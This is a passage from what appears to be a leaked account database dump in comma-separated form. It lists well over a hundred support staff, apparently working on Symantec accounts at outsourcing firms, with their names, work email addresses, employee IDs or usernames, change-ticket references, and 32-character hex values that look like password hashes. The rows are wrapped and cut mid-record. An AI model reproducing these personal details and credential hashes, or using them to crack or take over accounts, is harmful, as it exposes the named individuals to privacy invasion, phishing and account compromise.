348-4885-8c8e-0fda61209353,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,b09c
98414a3eb98473f8f52cdb15a1f1,G,<blank>,Sangeetha_G1,Sangeetha,NULL,NULL,NULL
eea-4bbf-8f83-02db71ae474f,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,ae41
7fac4fdec4a546f4f3a1f1aeebdf,Saif,<blank>,Hozefa_Saif1,Hozefa,NULL,NULL,NULL
087-4d99-9948-ec4e27540a24,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,9aa0
81faa2e3c0855f27259d0bbbf42d,G,<blank>,Gowri_G1,Gowri,NULL,NULL,NULL
b33a-47cd-af9b-f8819a01532e,<blank>,<blank>,maria.eyherabide@teleperformance.com
.ar,<blank>,5bcc639017f3b95efd178f5f76f54b8a,Eyherabide,<blank>,229999,Mar\xeda
Fernanda,NULL,NULL,NULL
714-4986-8ab4-98356258eeb3,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,9cec
fc696117395b7aae3718253abaf1,Dash,<blank>,Deepak_Dash1,Deepak,NULL,NULL,NULL
df38-4350-b50d-70facfdc9d0c,<blank>,<blank>,jarola@symantec.teleperformance.gr,C
T - 12/09/2012 - CRQ000000800605,bf8245016d75b44767a52eb9b8d502b4,Arola,<blank>,
229970,Jari,NULL,NULL,NULL
c9ec-4474-bec0-66895da40ba9,<blank>,<blank>,olaine@symantec.teleperformance.gr,C
T - 12/09/2012 - CRQ000000800608,e0d99c78ffcb338c399805a5e0fb7493,Laine,<blank>,
229972,Otto,NULL,NULL,NULL
800a-4982-8eaf-e974859ccb1b,sms 29,INC000000254496,tools_id@symantec.suth.com,Su
therland,91f7b8d8a40c0864ca138831bce785c9,R6,<blank>,074416,Rajesh,NULL,NULL,NUL
L
6726-4032-bc95-40e3442323c7,<blank>,<blank>,ntiitinen@symantec.teleperformance.g
r,CT - 12/09/2012 - CRQ000000800621,ab10b545e540f3b7bd6b881d702f1757,Tiitinen,<b
lank>,229973,Nina,NULL,NULL,NULL
5ec2-46a7-bd18-058ef77bbce2,<blank>,<blank>,padmavathy_r@symantec.com,<blank>,03
36568c2167f50287c133cff85edd14,R,<blank>,padmavathy,Padmavathy,NULL,NULL,NULL
3ba-4a34-b5e4-0adf3ae29ed7,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,bda6
1efb55ac66ff1140807e37ad898b,SolomonD,<blank>,Jerish_SolomonD1,Jerish,NULL,NULL,
NULL
c76-4dcb-91e2-3e7ccc807835,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,649e
7d86b19833eec2ff122c5699b9cc,K,<blank>,Ranjith_K1,Ranjith,NULL,NULL,NULL
827-431e-8e15-4ea312f46a59,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,ee85
ee2d51d3247d5006709fed85fd52,G,<blank>,Lakshmanan_G1,Lakshmanan,NULL,NULL,NULL
9ca-4f07-bbc2-29fcf0de3002,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,e3bf
ab69930cdb76ce0c297d82535608,Jakka ,<blank>,Rakesh_Jakka1,Rakesh,NULL,NULL,NULL
f92-45e3-ab62-6905ef846281,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,fceb
8359d3f3e9fd83744da4819574c3,Mohammed,<blank>,Shyjas_Mohammed1,Shyjas,NULL,NULL,
NULL
ae8-4e25-98fa-b02db8925c0c,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,53cc
3b3bfff194b01dff109f18cfa854,Chedella,<blank>,Naresh_Chedella1,Naresh,NULL,NULL,
NULL
6592-494b-9371-fbfabdcee2a9,BPR-22-01-10,INC95597,symantec_2nd_maa@tp-tec.nl,TPH
,155ddd2fd5ddc193a972916613eb248e,Grummer,<blank>,070345,Piet,NULL,NULL,NULL
2558-4737-9eb0-48518adc4fae,<blank>,<blank>,Jayanthi_IM@symantec.com,Symantec,d6
7190c88194ffd0aa85dffe5a169251,IM,<blank>,111531,Jayanthi,NULL,NULL,NULL
fce7-4754-9c57-29e961d0a97f,"CRQ000000830096 CLNP Oct 08,2012",000-0000,joey_mac
apagal@symantec.com,Symantec,dfebb4473b03f0c0261c86d5872fc416,Macapagal,<blank>,
230585,Joey,NULL,NULL,NULL
bba2-4019-b27a-539d7a6a87e4,PM- 5/30/2011 - CRQ000000267141,<blank>,tools_id@sym
antec.suth.com,<blank>,545df1627d2f17bedd5cd97154854495,Purushothaman,<blank>,11
6568,Manoharan,NULL,NULL,NULL
7e4a-46ba-bf47-38832026b9f3,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,087c1db4f1bd4bf1e82c08766e38ab9e,haran,<blank>,092561,Hari,NULL,N
ULL,NULL
18c-4c81-abc3-b54a9d0568e3,<blank>,<blank>,raghunath.r@symantec.ts.e4e.com,E4E,f
637f72306770def5c2ca905255f5e04,Ranganathappa,<blank>,Raghunath_Ranganathappa,Ra
ghunath,NULL,NULL,NULL
e7c4-412c-92e3-f58663c09270,CRQ000000709695--vmd--26/06/2012,<blank>,jovita_dele
on@suth.com,sutherland,4dc6f0c61bee67c77f30e2af6bb087e9,De Leon,<blank>,226476,J
ovita,NULL,NULL,NULL
83b1-4842-bb24-73f0c2a78514,CRQ000000709695--vmd--26/06/2012,<blank>,xandrell_ad
riano@suth.com,sutherland,8e2eecf5823956654787ae02cfb09e23,Adriano,<blank>,22645
1,Xandrell,NULL,NULL,NULL
6a6-4342-81bd-8a3dc9fb252f,<blank>,<blank>,jonathan_briggs@symantec.com,Symantec
,b40021aac7cdc2a35ad411e55da3c4c5,Briggs,<blank>,carter_briggs,Carter,NULL,NULL,
NULL
6b1-423d-bdc8-34fcf41dd75c,<blank>,<blank>,syed.imran@ts.e4e.com,E4E,672d7d1e53d
8aa1d45690a98f500470e,Imran,<blank>,Syed_Imran,Syed,NULL,NULL,NULL
27c2-4114-9262-6b7fcb50880b,"CRQ000000830099 CLNP Oct 08,2012",000-0000,jonathan
_militante@symantec.com,Symantec,991062364a99732f48967d51e47d077f,Militante,<bla
nk>,230587,Jonathan,NULL,NULL,NULL
3783-4ded-a62f-aa24a1f0913a,CRQ000000709695--vmd--26/06/2012,<blank>,maryantonet
te_balmor@suth.com,sutherland,d4e8402a3ae8867b492aaf753f882286,Balmores,<blank>,
226441,Mary Antonette,NULL,NULL,NULL
55c2-42b4-8d6e-e693ba762efc,CRQ000000709695--vmd--26/06/2012,<blank>,marvin_inco
mio@suth.com,sutherland,be5f08cf596d859fe5b37544f30dcaa8,Incomio,<blank>,226452,
Marvin,NULL,NULL,NULL
d2d3-47c5-9694-9360f239d8dc,CRQ000000709695--vmd--26/06/2012,<blank>,trizthan_ta
gara@suth.com,sutherland,40b8106c782706a64837310101bd6477,Tagara,<blank>,226448,
Trizthan,NULL,NULL,NULL
bd96-4dc4-b463-91f23e9ac35e,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539238,8bb445384834effcdb3fb9f8495a8ce6,Ann Tapay,<blank>,124554,R
ose ,NULL,NULL,NULL
8ca4-4af8-992a-3b9bde708f75,"CRQ000000830102 CLNP Oct 08,2012",000-0000,leonardo
jr_miranda@symantec.com,Symantec,b30d56999b9f373ff6181b1669e8de20,Miranda,<blank
>,230588,Leonardo Jr,NULL,NULL,NULL
3f6f-4c44-95c3-ce6fd6d6b0b2,CRQ000000709695--vmd--26/06/2012,<blank>,katrinamich
elle_gala@suth.com,sutherland,d0213086ddd1ab5be42412d5d7737a29,Galang,<blank>,22
6447,Katrina Michelle,NULL,NULL,NULL
4a51-4196-91d0-41cbb1bfee64,sms 29,INC213497,tools_id@symantec.suth.com,Sutherla
nd,4b38721066c4dd21308efed683d77529,June Ferniz,<blank>,075170,Mark,NULL,NULL,NU
LL
55b6-42d3-9989-cbe72b5d2ee6,"CRQ000000719872 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,40c0bfbbe83eba21acbecb4109e9e029,Hadkar,<blan
k>,227498,Priyanka,NULL,NULL,NULL
ccd-4229-9a96-38ca7c808bb0,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,7be7
ba652e9880611b105a39d412f9e3,Manjunath,<blank>,Ranjith_Manjunath1,Ranjith,NULL,N
ULL,NULL
639-4440-b526-3b726abc7648,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f910
c749f4e4cd68e45121db28b754df,Magazine,<blank>,Vibha_Magazine1,Vibha,NULL,NULL,NU
LL
62f2-4bcc-a647-a84aaaab3932,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,98637aed2da031de9284fe9ff380dbba,Jr. Tubio,<blank>,075185,Deogracias,
NULL,NULL,NULL
d9e-49ba-a0ba-a80876070771,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,01be
a7c7947136aad9e01e9df48e7e3c,Govindarajan,<blank>,Sridhar_Govindarajan1,Sridhar,
NULL,NULL,NULL
60c-4d87-a9a3-98a1b64313bb,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,c033
ca615ba344f6f7781cc27c8fb459,Selvaraj,<blank>,Chandru_Selvaraj1,Chandru,NULL,NUL
L,NULL
1165-46d4-8720-28a561dc8db0,"CRQ000000719876 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,97bd7c9f652cca4f1c090f4921c37f03,Unwalla,<bla
nk>,227499,Neha,NULL,NULL,NULL
9d8-44d1-957f-da96287b7759,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,3bc2
df0b9ffe91a85e87b63e1932c3a8,Jha,<blank>,Anubhav_Jha1,Anubhav,NULL,NULL,NULL
79a-4a90-a771-6287544cbade,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,fc50
f9ffb5fea5dd9378dd16d7053d84,s,<blank>,Kamaraj_s2,Kamaraj,NULL,NULL,NULL
2ebe-4e1d-ad5d-c6b68af4cf09,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,0c9e6c29d745c8e3d5acd8237e42ae2f,Knightsuth13,<blank>,094459,Knight,NULL,NULL,N
ULL
f058-4091-beac-d6c8789cf6b4,gautam_mehrotra@suth.com,<blank>,gautam_mehrotra@sut
h.com,sutherland,e448bf4d8574ec2880c3e700c1c084a5,Mehrotra,<blank>,092566,Gautam
,NULL,NULL,NULL
10fe-4eac-b972-a0286f4b4c22,CRQ000000709695--vmd--26/06/2012,<blank>,ianjoseph_a
gapito@suth.com,sutherland,bbf61b7059deda9e461a72989825f16b,Agapito,<blank>,2264
84,Ian Joseph,NULL,NULL,NULL
a026-4b6c-9a04-f8eaf68d2bda,CRQ000000718029--vmd--03/07/2012,<blank>,judel_rya@s
uth.com,sutherland,180834198fd21d1ca4afc063c16f6361,Rya,<blank>,227389,Jude L,NU
LL,NULL,NULL
1a0-4bd3-a3e3-a27b15681cd7,<blank>,<blank>,shelly.dsilva@e4e.com,E4E,a007b332f03
a6c016438bb350bb4ab3d,Dsilva,<blank>,Shelly_Dsilva,Shelly,NULL,NULL,NULL
5d74-4d38-aaed-d853138d756c,"CRQ000000830150 CLNP Oct 08,2012",000-0000,angela_r
egaza@symantec.com,Symantec,aecfaceafe12d6852552961e95f4a844,Regaza,<blank>,2306
05,Angela,NULL,NULL,NULL
44b-4714-aff8-9100e994d550,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,9801
1dd2713b0262afc1aad6de12260c,DavidA,<blank>,Arockia_DavidA,Arockia,NULL,NULL,NUL
L
404-480d-bc99-568a1144c16c,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,bd17
7be52ed0eddd1752e0a966ee97fc,v,<blank>,Sudha_v,Sudha,NULL,NULL,NULL
492-49ff-9e51-b2d1118ef0b1,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,32d8
e2d8bd73a1ed81a86d37022a14a6,p,<blank>,Kowsalya_p,Kowsalya,NULL,NULL,NULL
2f2-480a-90fe-2fd6ab508d37,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,cce7
9e0b648ae778aafd3bd291151c11,Singh Chouhan,<blank>,Ugam_SinghChouhan,Ugam,NULL,N
ULL,NULL
613c-443f-8df1-ab75d71c450e,CRQ000000709695--vmd--26/06/2012,<blank>,jacqueline_
gomez@suth.com,sutherland,780cf8753579262ebf963f99d307e75b,Gomez,<blank>,226471,
Jacqueline,NULL,NULL,NULL
6c1-48ac-a794-f5006169ac69,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,003f
ffeb3950ea3611ab140236417302,KrSharma,<blank>,Ashok_KrSharma,Ashok,NULL,NULL,NUL
L
1ff-41f5-ba26-7f0d6651ce3c,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,7756
d289faa0ada0f9a7ece49a372ab1,Sarathi Majumdar,<blank>,Partha_SarathiMajumdar,Par
tha,NULL,NULL,NULL
fda-4347-8f53-3df31338acff,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,9c17895e5893ede616d597dfa2be151c,C,<blank>,ArjunKrishna_C,ArjunKrishna,NULL
,NULL,NULL
06ec-4719-a42d-0810d3899037,CRQ000000236148-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,0ccf1d3f756c0c0d90d778cc26db7d68,Diaz,<blank>,114784,Jink
y,NULL,NULL,NULL
687b-4d08-af3c-53b7baec71a8,CRQ000000709695--vmd--26/06/2012,<blank>,dulce_valen
cia@suth.com,sutherland,d4c401f1e315120351fb14161689345d,Valencia,<blank>,226478
,Dulce,NULL,NULL,NULL
d58-4287-a484-ee81a8572de7,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,8eec
034aedcb99406363c403381dea64,Tayyab,<blank>,Mohammed_Tayyab1,Mohammed,NULL,NULL,
NULL
3a1-4af2-b7b7-557501c4d7c8,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,ad7c
834d87abc75b00ce9728782a64f3,R,<blank>,Ramesh_R1,Ramesh,NULL,NULL,NULL
b5ca-4a4b-8bd9-6be2b6c8eef2,CRQ000000709695--vmd--26/06/2012,<blank>,jevelonjose
ph_canlas@suth.com,sutherland,7d8b55d2a3c70a8b845eac992508046b,Canlas,<blank>,22
6482,Jevelon Joseph,NULL,NULL,NULL
5bb-42ec-beb7-7c6abde330f7,<blank>,EMPROV/2635069,tools_id@symantec.suth.com,Sut
herland,2d02b543380976533000788409a584ed,Pabbuleti,<blank>,091796,PothanPrasad,N
ULL,NULL,NULL
b4e-42d3-b4f5-6b895114e3d1,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,27cd
31d158b76ec633a5398ae05c2f2f,Sharma,<blank>,Prerana_Sharma1,Prerana,NULL,NULL,NU
LL
41f-4cf6-bd8d-2966d3408f58,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,61c7
d78ceac1cbc00873b8099f039f5c,Raju,<blank>,Mithun_Raju1,Mithun,NULL,NULL,NULL
fba6-4b8f-9feb-4ce15cd0d6c1,CRQ000000709695--vmd--26/06/2012,<blank>,eileen_paya
ng1@suth.com,sutherland,13bc7baaacf5fb6f89846ff920ce84df,Payang,<blank>,226438,E
ileen,NULL,NULL,NULL
25b6-4b39-a06a-2d518a623bff,CRQ000000709695--vmd--26/06/2012,<blank>,johnchristo
pher_cabr@suth.com,sutherland,7abb36582aebc16fa1296cf778c575b4,Cabrera,<blank>,2
26470,John Christopher,NULL,NULL,NULL
b18-4609-8c9a-4103624b3254,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,a3e1
bf504231057a7c266853e69f03ab,Ovais,<blank>,Ibraheem_Ovais1,Ibraheem,NULL,NULL,NU
LL
88e-4dd2-8feb-dedd60950b7a,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,2df0
74d72f4dbc3f061b2becaa1fe8fb,S I,<blank>,Anoop_SI1,Anoop,NULL,NULL,NULL
801-42b2-b675-de5b3de00eee,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,4f7e6e1f79bb86564152de4d2a8143e2,Niraj,<blank>,Hanu_Niraj1,Hanu,NULL,NULL,N
ULL
e73-46a6-b7b3-7e44c74e6d24,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,36dfff15f53edfeb89f86981e7afda07,Haneefa,<blank>,Sinchu_Haneefa1,Sinchu,NUL
L,NULL,NULL
0d2-43de-84ed-82773eefcc95,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,39b2
56433924326c6a740a34bb3aa14d,Gavaskar K,<blank>,Sunil_GavaskarK,Sunil,NULL,NULL,
NULL
5055-4614-8b4f-d1a125fe13e0,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518259,bbab60446fcc3b748c77deccb2550c2e,Puno,<blank>,124191,Adria
nne ,NULL,NULL,NULL
932c-4186-bcb4-9d06cc4ed575,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518270,ab8d0eeddd7dd1f6a057ab6caad72a08,Reas,<blank>,124193,Rolan
do ,NULL,NULL,NULL
21e-475a-8e2d-94e7dd0a69ec,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,01311e748d189bdecd4d6a8e9e803431,Kumar,<blank>,Madhan_Kumar1,Madhan,NULL,NU
LL,NULL
4b0-40c2-a747-e5e4ef20075e,<blank>,<blank>,symchatteamleadschennai@chnts.e4e.com
,E4E,1d3bf0d488019f922b99e79c8f3e3085,Gopinathan,<blank>,Inesh_Gopinathan1,Inesh
,NULL,NULL,NULL
de57-48aa-99e4-b5ee9adc6fa0,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,e5951ca81e884dc18e5a9fbf3ce6613f,MasoodAhmed,<blank>,
104642,Shaik,NULL,NULL,NULL
6f22-4c02-803c-fc7b4f5bf13b,<blank>,<blank>,sieg_santos@spi.com,CT - 18/06/2012
- CRQ000000699562,0e0ab8c2d1e84dc42e71c5497438a330,Santos,<blank>,226930,Sieg,NU
LL,NULL,NULL
3158-4cac-8980-9760f0b212e9,<blank>,<blank>,Jheremy_Toledo@symantec.com,PM - 9/1
1/2012 - CRQ000000800301,03b43d6850f61f71a3ecfef3d6609d2d,Toledo,<blank>,223521,
Jheremy,NULL,NULL,NULL
148-4bc4-8d4d-27235e4ba406,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,6085
828a107835618ab9f933191b726e,NULL,<blank>,Balakumar,Balakumar,NULL,NULL,NULL
1e62-40bf-8176-70d663666eef,<blank>,<blank>,crissy_carlos@spi.com,CT - 18/06/201
2 - CRQ000000699566,12825910d90de682d678149dc3fbdc36,Carlos,<blank>,226931,Criss
y,NULL,NULL,NULL
8f8e-4c55-b079-4f9c5ebe6e10,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,59fd63f089674f771a6555d4cd91c4d0,Elbanbuena,<blank>,095033,Maria Christine Basc
o,NULL,NULL,NULL
1bd9-400f-88dc-bded1f146d3d,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,2343f017a5b596b068e67bcad6f69e05,Resma,<blank>,076136,Ch
ristelyn Aguilar,NULL,NULL,NULL
7dbf-4b4f-ab9c-44307f13fc8b,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,1aad01ad9e50fa264c91be336a56fe88,GarimellaGopalaKrish
na,<blank>,104644,Swapna,NULL,NULL,NULL
7471-4f06-8521-5b308fe4a8a8,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,0ee5afbdec4990f7e2158e20cfbd169b,Israel,<blank>,113238,G
enevev,NULL,NULL,NULL
f9b-4686-9238-278b9d1bcf85,<blank>,86066/2635106,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",1b219a798092d68fbe8dae895b5d7f8f,Sebastian Pellis
sery,<blank>,foby_sebastianpellis,Foby,NULL,NULL,NULL
106b-435f-ba48-1e848ebc1a02,SRB 28.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,24b0225c52ebb4c1ebae459190a410bd,D,<blank>,088361,Arun,NULL,NULL,NULL
3304-497c-8894-671383454b45,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,286a453cab7c76473265ba733ff0ecbf,SaragenaAbad,<blank>,10
0089,KaranGrace,NULL,NULL,NULL
8ba-40ae-9594-bc99f7896155,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,4bf7
55de90109d959c630bd7ed36ec00,NULL,<blank>,Neelkamal,Neelkamal,NULL,NULL,NULL
9aff-438a-b3e7-d80a183b96dd,12/01/2010 - SPJ,EMPROV,May_Cui@Symantec.com,Symante
c,3c725e4ab9898187f6a58c5d6ce084ca,Cui,<blank>,063448,May,NULL,NULL,NULL
7156-4eb9-9778-b963c40b9318,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,94870f7b8591151543c277e1c41c3c5d,Selvam,<blank>,113243,G
owri,NULL,NULL,NULL
2f8-4960-848f-280ac89ce1a8,<blank>,86125,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",30b82f54fda2271acb31d838080db8da,P,<blank>,sujith_p,Sujit
h,NULL,NULL,NULL
a37-4396-9080-044475ab7487,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,4014
aa67d36f0aca24ea3ef6db297d26,Ahmed,<blank>,Bilal_Ahmed1,Bilal,NULL,NULL,NULL
901f-4295-8682-181440c127a6,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,45b788ebf47defb93ef5d37b44722f2b,Villanueva,<blank>,102860,Rovel,NULL
,NULL,NULL
abd-4029-96a7-6da08e22789f,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,4ec8
3cc3848b96f8ff868ff0bed92cdb,S,<blank>,Vijay_S1,Vijay,NULL,NULL,NULL
34dd-4ba5-bf54-46b146c5e180,<blank>,2664136,nh.symantec@teleperformance.com.ar,T
PA,1b0729eb44baeefd3022ed56c90c2ae2,Tambasco,<blank>,091270,Brian,NULL,NULL,NULL
55db-4ba9-809a-5bbfebc22951,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,7bf58f32003427792b33d72e35dafb81,Aldover,<blank>,099765,
Aris Deo Castillones,NULL,NULL,NULL
576-466e-a96f-02b3f0051b02,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,5780
6b8010f39b4b9c02efbc6bd522ba,Chanda,<blank>,Anand_Chanda1,Anand,NULL,NULL,NULL
a6b-4ec0-8fd6-b25972d92c07,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,e30e
653d3632bb2dcd687c5c6c4b4d2e,Kumar,<blank>,Ganesh_Kumar1,Ganesh,NULL,NULL,NULL
4a51-4139-9efa-4b2ad7e3db63,CRQ000000724059--vmd--10/07/2012,<blank>,leomel_pade
ran1@suth.com,sutherland,26c2ccde01a547cfd0454dca5685c433,Paderan,<blank>,226456
,Leomel,NULL,NULL,NULL
981-4a5e-a4c2-5dc16720e81e,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,fb91
0b6bc840742f3c11373346456797,Chhabra,<blank>,Vandana_Chhabra1,Vandana,NULL,NULL,
NULL
15d-4a5c-8fd2-dac674543f8f,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,a7ed
78ad12509517a3d5811f95144124,Bhimseria,<blank>,Ashish_Bhimseria1,Ashish,NULL,NUL
L,NULL
81ed-46d0-a872-9254d4ff02e8,CRQ000000513260--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,e7acf99211f3c7dfb924e4c2ed2e1ae9,Potane,<blank>,12368
2,Ferlyn,NULL,NULL,NULL
d1d0-4072-a083-ae3aae5fb288,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518108,e4d65dbf89019eacd151de74c9821b1f,Campo,<blank>,124166,Mark
Aldrine ,NULL,NULL,NULL
6cff-4327-815e-0abea388c066,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,9f770476b34b48b2a3b7d82535314ecf,pur,<blank>,86000,rajasenthilkum
ar,NULL,NULL,NULL
283-477e-954c-9ef097470d8d,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,b25b
a114d22f6bab35954e9c9913f150,Nambirajan,<blank>,Sivalingam_Nambirajan2,Sivalinga
m,NULL,NULL,NULL
58a-4db4-b461-b95b111cc2c1,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,2e92
b671106b4a2892aeb20dce29943b,C ,<blank>,Mahesh_C,Mahesh,NULL,NULL,NULL
2e66-4cdb-bcb0-90a08da940fa,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518122,3843f0e46b4dfc05e40cb49232185660,Gabales,<blank>,124170,Jo
elJoseph,NULL,NULL,NULL
0c9e-48c0-969d-afaa98bbc8d9,CRQ000000724069--vmd--10/07/2012,<blank>,johnpaul_mi
randa1@suth.com,sutherland,6310ea4eeeec8cac615aea015412b65b,Miranda,<blank>,2264
63,John Paul,NULL,NULL,NULL
533-4569-a4a8-9187d92b993b,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,2bff
bdf6eee509e3751c1702b8bd2f60,NULL,<blank>,Santosh,Santosh,NULL,NULL,NULL
2d5-4583-971e-249e570c9207,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,1340
06657ee6be261c8196ee20a96a4e,R,<blank>,SathishR,Sathish,NULL,NULL,NULL
6b6e-4024-8f8c-f5a576174e86,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,09b1026fbe434b2071b42cb7b6473b31,CabanatanDizon,<blank>,
097488,Mark Anthony,NULL,NULL,NULL
2b8-445d-9717-ea5e949b89b4,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,29ad
3e70b411608dffda9448b1eb1202, ,<blank>,Varun,Varun,NULL,NULL,NULL
3523-4e90-8972-7f22bef8d9b2,SRB 18.05.2010,emprov,tools_id@symantec.suth.com,Sut
herland,9cf7bee0798812b9f0bd93d677edc0a4,Balivada,<blank>,094894,Sandeep,NULL,NU
LL,NULL
6d0-4386-9a27-1db0b065d8a3,<blank>,<blank>,symaccounts@e4e.com,e4e,bc826f88bfaf6
8938725244da2546680,Yadav,<blank>,Anjili_Yadav,Anjili,NULL,NULL,NULL
73d3-4998-a95f-1cc4ecb79b02,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,446e0de709693ff93211fc98c0a1d8ae,M,<blank>,074965,Arun,NULL,NULL,NULL
6dc-4562-8a12-2c128d5f779e,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f807
cf0cce6a96cda4aa52e12b58f9bd,Das,<blank>,Ankur_Das1,Ankur,NULL,NULL,NULL
a48-45bc-8819-0010ed7c432a,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f6f4
aba48df59d821d01d0fd0046af09,C,<blank>,Chetan_C1,Chetan,NULL,NULL,NULL
fe8-45f2-8180-2a402cfd1d78,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,099e
dd40285ed27b67b8dd5cf72d8990,James,<blank>,Jathin_James1,Jathin,NULL,NULL,NULL
c43-4adc-a5dc-8855e54a7faa,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,a574
93d9c183d9e3ed6639e0726ce4be,NULL,<blank>,David,David,NULL,NULL,NULL
7e6-4a3e-88ee-41aec1299a97,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,df4f
522a39c27f0bd054127d543c8fc3,Das,<blank>,Debarati_Das,Debarati,NULL,NULL,NULL
b9c4-4979-bc19-751fc6016ad6,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,abc5c06aadb3176eaee544832d74125b,paulpandi,<blank>,09
9588,MohanRaj,NULL,NULL,NULL
eed-4cc0-9b5d-d85468a0f2f9,<blank>,<blank>,vallie_majors@symantec.com,Symantec,c
7283c7c00800544b3b27bb422715846,Scott,<blank>,091777,Casey ,NULL,NULL,NULL
2108-497d-ac05-d61e292abfa9,<blank>,<blank>,alvin_ricarde@spi.com,CT - 22/06/201
2 - CRQ000000706111,28c6b3c91fbbba24458bd391ede2070f,Ricarde,<blank>,227179,Alvi
n,NULL,NULL,NULL
16c-40e7-b357-270c486b46f3,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,4178
e4a40e1caf955fc996a0ee47be49,NULL,<blank>,Pradeep,Pradeep,NULL,NULL,NULL
f22-464c-8306-d1d4dd4c12db,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,6911
539d441eb1c35e8f632269136e78,Behera,<blank>,SatyaPrakash_Behera,SatyaPrakash,NUL
L,NULL,NULL
f969-4f0f-97ac-082bbaa4d99e,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,e09e92d3ebda9311c75427480313e4e1,Bitacura,<blank>,075514,Elizabeth,NULL,N
ULL,NULL
b0b6-40ee-89d3-cd2797093e74,<blank>,<blank>,dwight_ragunton@spi.com,CT - 22/06/2
012 - CRQ000000706114,6db1061e71e840bda6ad04c80ad7af74,Ragunton,<blank>,227180,D
wight,NULL,NULL,NULL
1f57-4838-827a-57410a040763,CRQ000000267161--VMD--30/05/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,913e6631562074fdf56f80d9d4e51b7a,L,<blank>,116611,Jee
vith,NULL,NULL,NULL
5e1d-4650-865e-60706b860664,WS 20-07-2010,INC000000220688,Jason_Johnson1@symante
c.com,<blank>,8507836748d10db415e3fbe23bb8e9bb,Johnson,<blank>,091776,Jason,NULL
,NULL,NULL
767-41eb-af73-ea495ac25e58,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,2918
